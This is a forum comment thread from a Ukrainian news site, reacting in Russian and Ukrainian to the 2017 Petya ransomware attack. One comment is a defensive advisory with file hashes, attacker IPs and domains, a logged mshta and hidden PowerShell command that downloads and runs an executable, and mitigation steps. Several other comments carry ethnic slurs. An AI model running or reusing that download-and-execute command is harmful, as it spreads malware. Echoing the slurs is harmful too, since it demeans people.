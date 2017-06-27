EN|RU|UK
Темы дня: Кибератака в Украине Убийство Шаповала Дело Гужвы Дело Розенблата и Полякова Визит Порошенко в США Безвизовый режим с ЕС Суд над Насировым Покушение на Адама Осмаева Нафтогаз против Газпрома Задержания "налоговиков Клименко" Убийство бывшего главы "Укрспирта" Панкова Убийство Сергиенко Запрет российских сайтов Суды по делу Мартыненко Отставка Гонтаревой Война в Сирии Компромат на Трампа Приговор генералу Назарову Взрыв в питерском метро Убийство Вороненкова
 Форум Украины(608488)
Комментировать
Сортировать:
в виде дерева
по дате
по имени пользователя
по рейтингу
Совет форумчанПравила форума
 
Господа, список для того, чтобы вы туда не заходили. А то радостно все проверять.
 показать весь комментарий
Ответить
 
 
Нарешті ідіоти зрозуміють що безпека в Інтернеті це не іграшки і це коштує великих грошей. А то звикли за три копійки робити собі "сєрвачок на Лінуксє" і тримати на ньому всі свої ресурси.
 показать весь комментарий
Ответить
 
 
вот линукс к вашему сведению не подвержен этим вирусам, только винда.
 показать весь комментарий
Ответить
 
 
если ты про файловый менеджер- то не вижу проблем
 показать весь комментарий
Ответить
 
 
Лінукс так само не врятує від вірусів є віруси і під Лінкус.
 показать весь комментарий
Ответить
 
есть, тока их мало очень и они не такие страшные
там в ядре уязвимость была, которую 14 лет не могли пофиксить :D

список вирусов по никсы
 показать весь комментарий
Ответить
 
Он же не понимают, что оказывается на работе работать надо, и что не фиг шастать где попало:

 показать весь комментарий
Ответить
 
Для Линукса до теперішнього часу не має ні одного вірусу з самозапуском. ) Є віруси, які запускаються лише користувачем.
Не буду заперечувати те, що в Вінді багато неприємностей можливо запобігти, якщо працювати з правами користувача з обмеженним доступом. Але ж на практиці всім з незрозумілих причин позаріз потрібні права адміністратора. ))))
 показать весь комментарий
Ответить
 
 
ага, особенно на дебиан- вот ты шутник :D
фряху еще всем посоветовал бы
 показать весь комментарий
Ответить
 
 
а чё? я же перфокарты советую и не паскаль с фортраном, хотя фортран посоветую, для студентов, легче будет СиСи учить.
 показать весь комментарий
Ответить
 
 
пропустил пару букв, сорян. смысл утерялся . ща удалю
 показать весь комментарий
Ответить
 
Вот если бы ели пирожки с маком, то точно не было бы это проблемы
 показать весь комментарий
Ответить
 
Мак запрещенное нарко свойство. Так что никаких пирожков. Вот интересно, как мак на пирожки выращивают?
 показать весь комментарий
Ответить
 
Не знаю. проверял несколько серверов, которые точно на фришке - лежат.
 показать весь комментарий
Ответить
 
приват только с линуском и работает, знали чёта, нужно было вирус назвать " месть коломойши"
 показать весь комментарий
Ответить
 
Все набагато гірше. Всі свої ресурси тримають на яндекс-диску. А щодо "сєрвачка за три копіки" - такого за визначенням не існує. Навіть на Лінуксі. Хоча 98% серваків у світі ТАКИ працюють на Лінуксі .
 показать весь комментарий
Ответить
 
 
Партнерство начнется с пилотной программы по внедрению блокчейна в национальную цифровую платформу. Среди первых отраслей - госреестры, ЖКХ, социальное страхование, здравоохранение и энергетика. Сообщается, что после завершения пилотной программы проект распространится на остальные структуры, включая кибербезопасность. В В отметил, что BitFury планирует запустить пилотную программу «в конце 2017 года». запустят с июля хороший стимул АТАКА
 показать весь комментарий
Ответить
 
Я был хорошо знаком с руководителями отдела ИТ-безопасности "Новой почты" - ребята не знали как сервер Windows-2008 или 2012 установить на комп, а вы говорите защиту хорошу ю поставить. Ламеры страшные, поскольку то жена, то сестра продвинули их туда.
 показать весь комментарий
Ответить
 
Хороший способ "нахаляву" себя пропиарить, достаточно сказать, что тебя "хакнули" и добавят в список и все СМИ про тебя трубят.
 показать весь комментарий
Ответить
 
Во всём видеть пиар , это похоже на болезнь, не излечимую !
 показать весь комментарий
Ответить
 
ну теперь наши будут умнее- увидят что атаки это реально, а не только что могут атаковать другие какие-то далекие страны, а нас это не коснется
 показать весь комментарий
Ответить
 
ХОРОШО ЧТО ЕСТЬ КИБЕР ПОЛИЦИЯ !!!!!!!!!!!!
СЕЙЧАС ОНИ ВСЕ РАЗРУЛЯТ ))))))))
 показать весь комментарий
Ответить
 
комментарий отмечен как спам  
 
І Ти Тримай Гнида Українська !!!!!!!!!!!!!!!!!...

Список сайтов, пораженных в результате кибератаки - Цензор.НЕТ 6669
 показать весь комментарий
Ответить
 
Не знаю откуда это у тебя , но с точки зрения логики , это инструкция для называемой , так называемой - контры ( как любили называли в революцию противников савецкой власти , занимавшихся подрывной деятельностью ) . Это именно то , для чего и создаётся сеть вражеской агентуры в стране .
 показать весь комментарий
Ответить
комментарий отмечен как спам  
 
Вирус-"Пэтя А" точно маскали прикалываются, я под столом.
 показать весь комментарий
Ответить
 
 
Канал 24 ...зараз на кабельному працює у студійному коментарі ...Якраз тематика про кібератакі !!!
 показать весь комментарий
Ответить
 
Все нормально , а лучшие компьютерщики сидят пол-года без работы ..

Новый мировой порядок
Позади .. А жизнь ключом-вопросом бьет без сожалений.
И Ваш Бог живет в лучезарности луны и ваших устремлений.
Позади .. А длинные ролевые игры и судьбы изнемождений ,
И в логове казуального бытия смелы и в череде слепых рождений
Позади..Выискивая странности у других, но без личных изменений
И Ему жалко жалости мирским страстям и духу воплощений .
Позади.. Весь смысл изменить неизменяемое - людской удел заплесневелый
И неугасимые-лампады-счастья-любящих-создания-монады -- ПОЗАДИ .
А где запятую ставить я - Вам дьявольски отдаМ ....
И дрожь тут не унять и взгляд ангела Земли порочный ,
И чувства наши вплетены в сознание пришельцам ,
И Архитектор-анти-Криатор избы - есть наш БОГ незваный ,
Путь пройден по Днепру .Я кстати там ,
Где раньше инопланетный разум не рад был вам
И в мере возбуждения вашим вещим снам
Я там , на Украине ,на глубине страстей первичных насаждений .
В астрале времени - ментале вожделений.
Все просто - пассажи светлых изменений
Предо мной я..., звуки тайных зарождений
Вижу я не в первый раз наверное .
Сижу я слушаю , курю и вижу ваше соглашение ,
Ведь Темный .. это Он - лихое изменение .
Земной судьбы узоров тайны просвещение ,
Узнал в сем злобном сабже я , где в правде упоение
И Он !! Он Люцифер в эфире рядом - богов молва ..
Он здесь, над головою святая синестезия жива ..
Жужжа судом иных , прощается с ботвой сего мирка.
Мирка - существ с душой шакальей ,уставших от реального добра
. А инопланетные гребут Земельку наперебой толпой ,
Оставив нам ее опустошенной , тонкой , но широкой и нагой .
Сей хитрый образ культа - Он со мной.
В могилу избавленья хитро зазывает-навевает ,
И риффовым потоком соблазнения - наитием толкает и толкает
Толкает Он бежать. Бежать что бы Христа грехи забрать ..
Туда , где обещал Он дать ,
Богов .. отчаянья , отчаянье вселенной децибелы, и сохранить
Сохранить ведь должен нас Он в переходе - не потерять.
Он Be'lakor-создатель радости и синевы печать
И пламень неземной Козел \/ на всех потоках преподносит
И Бог оставит нас и ЗЛОСТНО не осудит.
Но в вере на кого-то , они и вы как все ,ведь жизнь сжигают ,
Так легче и понятней так , эгоистичные дибилы лают..
Он \/ в мире злом воюет кстати - да,да - да, и вы пушисты и белы
А Он-Укроп, он умирающую гордость Вида Сохранит
Он миру дал часть себя, Он Мефистофель Совести Земли !
Но синего мерцания вдохновения иных ,
Нам ближе к духу ,чем шлея души от тел чужих !!!
Как ждал я ключ , для чувств моих-своих
Тут риффы ведь ментальные - друзья судьбы ,
И магии старинные колонны и религии проходы ,
И Енохинианские затворы - темнейших величественные стоны .
Астральных недругов святая дробь под дых,
Все то, что я всегда хотел от них .
У нас судьба едина, одни и те же муки от чужих
И исцеление любви , и мир ментала не утих
И соизмерения святого не для них .
Пока цинизм тут правит , не одинаков наш удел!!!
Ведь Души есть не из сего мирка тут, и это их задел .
И бездуховные тела на Украине в бытии ..И вышли
И вышли из Омеги,да и зайдут после болезни кстати
Болезни Времени - сквозь кровь богов взошли.
И спектры гипотетического рая и Аврамизм нам не у дел!
Мы кровь богов!!! И Днепр люто заревел,
Ведь Украинец , как настоящий инфернал ,
Ни перед кем колени не склонял
А так лишь Темный \/ пос
 показать весь комментарий
Ответить
 
Укрпочта? Серьезно? Там, что есть компьютеры?
 показать весь комментарий
Ответить
 
 
хорошая репетиция артподготовки перед наступлением.
 показать весь комментарий
Ответить
 
А наши айтишники помогать стране не будут . Сами знаете почему ...
 показать весь комментарий
Ответить
 
 
У меня ext4 , мне до одного места ваши проблемы
 показать весь комментарий
Ответить
 
Моя бабушка сказала : "список бакланов" . Продвинутая старуха .
 показать весь комментарий
Ответить
 
 
Блатное - хулиган, беспредельщик.
СтароСлавянское - большая голова.
 показать весь комментарий
Ответить
 
Если доберутся до "Рошена" надо комп выключать. Тогда уж амба интернету.
 показать весь комментарий
Ответить
 
 
Так там большая часть - рашкины (прорашкины) конторы
 показать весь комментарий
Ответить
 
 
Нехреново так кремлядские хакеры страну нагнуть могут. Вроде наш переможный Пёдр что-то заикался то ли про кибер-войска то ли кибер-полиции. И где оно?
 показать весь комментарий
Ответить
 
 
Они сейчас на упаковке конфет РОШЕН. На суботнике....
 показать весь комментарий
Ответить
 
Кстати, футбол.юа тоже попал? (тоже прорашкинская курченковская контора)
 показать весь комментарий
Ответить
 
 
Ждем контратаки на кацапов - Других вариантов быть не может!
 показать весь комментарий
Ответить
 
громадяне, заспокойтеся!
рошен не постраждав!
 показать весь комментарий
Ответить
 
комментарий отмечен как спам  
 
это прекрасно) а когда до цензора.нет доберутся?))) , или они выбирают помасштабнее ресурсы
 показать весь комментарий
Ответить
 
 
"подверглись атаке вируса Petya.А." Петр Алексеевич Порошенко - москали канеш не паляццо с названием вируса)
 показать весь комментарий
Ответить
 
 
У нас є Горіховий спецпідрозділ,який опонентів пресує за бабки і по заказу однотурових,і щоб рошен не обідили не дай бог,а так більши ні на шо не здатні,даже реформи провести не можуть і повиганяти ФСБешників,які нагліють не криючись....
 показать весь комментарий
Ответить
 
розенка радостно постит фотки скина со ссвоего монитора и пишет, что у всех в кабмине так - хоть бы не позорися. Жлобье, тольки пи@дить умеют а на остальное ( в том числе IT) денег не остается.
 показать весь комментарий
Ответить
 
 
Візьміть до уваги.
Сьогодні в першій половині дня розпочалася масивна хвиля атак із застосуванням нового зразка ransomware.
Попередня інформація:

Механізм розповсюдження - копіює WannaCry, використовує MS17-010 для розповсюдження по мережі
Механізм шифрування - після активації із затримкою призводить до перезавантаження системи, після перезавантаження проходить фейковий chkdsk і жертва бачить повідомлення про викуп. Процес завантаження ОС далі не продовжується. По аналогії із Petya Ransomware шифрує/пошкоджує MBR.

На руках є зразок трояну який розсилався сьогодні зранку але 100% доказів його причетності до шифрування поки не маю.

Маркери компрометації (IOC)
- - - - - - - - - - - - - - - - - - - - - - - -

File Name Order-20062017.doc (насправді RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data

Ініціює зєднання із хостом

84.200.16.242 80

h11p://84.200.16.242/myguy.xls (насправді HTA)

File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')
10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes

Ініціює зєднання із хостами

111.90.139.247 80
COFFEINOFFICE.XYZ 80

Ще раз звертаю увагу - троян по якому я даю маркери потенційно міг бути використаний для завантаження шифруючої частини.
На тестових системах у мене через 30 хв після активації шифрування не відбулося тому це можуть бути дві різні розсилки.
Як отримаю нову інформацію - повідомлю.

Рекомендації:
- - - - - - - - - - - -

1) Перевірити журнали систем на наявність наданих вище маркерів компрометації
2) По можливості на мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP
3) Якщо зараження вже сталося в жодному разі не допускати до перезавантаження системи (cmd /k shutdown -a)
4) Системи, які вже зашифровані не форматувати одразу, а зняти образ їх диску
5) Блокувати запуск .exe в %AppData% та %Temp%

Будьте уважні та обережні.
 показать весь комментарий
Ответить
 
 
УКРСОЦБАНК так же умер - сайт не работает, телефоны молчат. Платежы по карточке проходят без смс-кода
 показать весь комментарий
Ответить
 
По списку сразу стало ясно кто близок к раше. Западные компании в Украине не подверглись атаке.
 показать весь комментарий
Ответить
 
Чому - дивуватись? Все закономірно. Згадайте історії IT-шників... Де зараз більшість з них? Хто не годує свою армію... Що не відомо?
 показать весь комментарий
Ответить
 
половина учреждений и без атак работает как будто их вирус поразил. КЛЕПТОКРАТ..так что переживать не стоит
 показать весь комментарий
Ответить
 
Заявка на хаос. Мы готовы? Шёл четвёртый год войны, с рашисткой нечистью...
 показать весь комментарий
Ответить
 
вирус ПЕТЯ А. и в росии только роснефть атаковал.гибридная война она такая.
 показать весь комментарий
Ответить
 
Ума не приложу - ну кто бы это мог организовать?
 показать весь комментарий
Ответить
 
 
Нехрен госслужащим на порносайтах сидеть и вирусы цеплять . . .
 показать весь комментарий
Ответить
 
Добавьте туда www.dsszzi.gov.ua/ - главных по IT-безопасности в Украине. Орган по сертификации IT-систем, Державна служба спеціального зв'язку та захисту інформації України, широко известный в истории с сертификацией системі е-декларирования, и продолжающий стричь мега-бабки с "комерсов" за обязательную сертификацию систем для госорганов - не смог защитить даже свой сайт, не говоря уже о ресурсах других госорганов.
 показать весь комментарий
Ответить
 
Ну що, курви, догрались з Касперскими, Яндексами, майл.сру і "контактами"? Так вам ПДРАМ і треба.
 показать весь комментарий
Ответить
 
почему в IT должно быть лучше чем в стране?
 показать весь комментарий
Ответить
Цензор.НЕТФорум УкраиныСписок сайтов, подвергшихся кибератаке (обновляется)
 Сейчас пишут
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
V T 2fd9d4b9, secret secret_too, NNN, Alexandr Slavich, КузьмичUA, Скромный Кролик, Владислав В e3236bf0, Злой Циниик, larisa890, Глеб Жеглов 2578b002, Григорий Барковский 5bc4f112, gassab, Angelika Karatova, Гоша Печерский, Vasyl Moroz e17dc259, Amber, Сергей Боровой 8d42a1dc, frosch, Gabriel Monte, Nino, Владислав Максименко f7b0dec4, Nick Vasyutin, Olga A 6130c05e, Андрей Черевко ab226fee, Aleks_15, Vlad1606, Conrad, Cтарий Кінь, 2Ghfdlf, Jala Pribila, Aleksandr Cubik, fedjka - fedjka, Murlin Murloff, Tatyana Pomolova, Сергей1500900, Alex Ananiev, Ming Uing b56f719d, Шагай Правой, eadem, Seva Round, 4Liberty UA, Аль Капучіно, Ars UA, Ruslan Tkachenko, Marat Davydov, Juli Schubs, Сергій Гранін, Юрий Примак, Чип, Alex Korvin, Ричард Третий, Василий Мищенко 8ea4b7ee, Андромеда, Tierre, Valeriy Bondar 77eb3d4b, Nov, Игорь Д, Андрей Ильчук, Vedana, GoodWin, Гела, Жан Мишка Жар, Mykola Bratiichuk, I'm Conscious, Pyga BESTia, Александр Славный aed44137
 Всего на сайте: 219 писателей
 
 
 
 
 
 вверх
Следите за нами в Твиттере
Перейти
Читайте нас на Facebook
Перейти